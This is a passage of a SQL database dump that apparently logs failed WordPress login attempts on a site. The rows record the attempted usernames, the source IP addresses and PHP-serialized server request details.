04:24:38'),(94854,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"125\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51260\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"125\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746139904.800041;s:12:\"REQUEST_TIME\";i:1746139904;}}','196.251.112.104',1,'2025-05-02 04:21:46','2025-05-03 04:24:38'),(94855,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51128\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746140076.179245;s:12:\"REQUEST_TIME\";i:1746140076;}}','196.251.112.104',1,'2025-05-02 04:24:38','2025-05-03 04:24:38'),(94856,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51127\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746140076.177973;s:12:\"REQUEST_TIME\";i:1746140076;}}','196.251.112.104',1,'2025-05-02 04:24:38','2025-05-03 04:24:38'),(94857,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"120\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51129\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"120\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746140076.181154;s:12:\"REQUEST_TIME\";i:1746140076;}}','196.251.112.104',1,'2025-05-02 04:24:38','2025-05-03 04:24:38'),(94858,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"117\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51131\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"117\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746140076.184051;s:12:\"REQUEST_TIME\";i:1746140076;}}','196.251.112.104',1,'2025-05-02 04:24:38','2025-05-03 04:24:38'),(94859,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"118\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"51130\";s:11:\"REMOTE_ADDR\";s:15:\"196.251.112.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"118\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746140076.173491;s:12:\"REQUEST_TIME\";i:1746140076;}}','196.251.112.104',1,'2025-05-02 04:24:38','2025-05-03 04:24:38'),(94860,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"104\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63382\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746438651.0612271;s:12:\"REQUEST_TIME\";i:1746438651;}}','107.151.209.126',1,'2025-05-05 15:20:52','2025-05-06 23:44:41'),(94861,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63396\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746438651.0582731;s:12:\"REQUEST_TIME\";i:1746438651;}}','107.151.209.126',1,'2025-05-05 15:20:52','2025-05-06 23:44:41'),(94862,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63381\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746438651.0574839;s:12:\"REQUEST_TIME\";i:1746438651;}}','107.151.209.126',1,'2025-05-05 15:20:52','2025-05-06 23:44:41'),(94863,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63337\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746438651.0671279;s:12:\"REQUEST_TIME\";i:1746438651;}}','107.151.209.126',1,'2025-05-05 15:20:52','2025-05-06 23:44:41'),(94864,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"63347\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746438651.0534539;s:12:\"REQUEST_TIME\";i:1746438651;}}','107.151.209.126',1,'2025-05-05 15:20:52','2025-05-06 23:44:41'),(94865,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"108\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50162\";s:11:\"REMOTE_ADDR\";s:15:\"107.151.209.126\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"108\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746440692.1477029;s:12:\"REQUEST_TIME\";i:1746440692;}}','107.151.209.126',1,'2025-05-05 15:54:53','2025-05-06 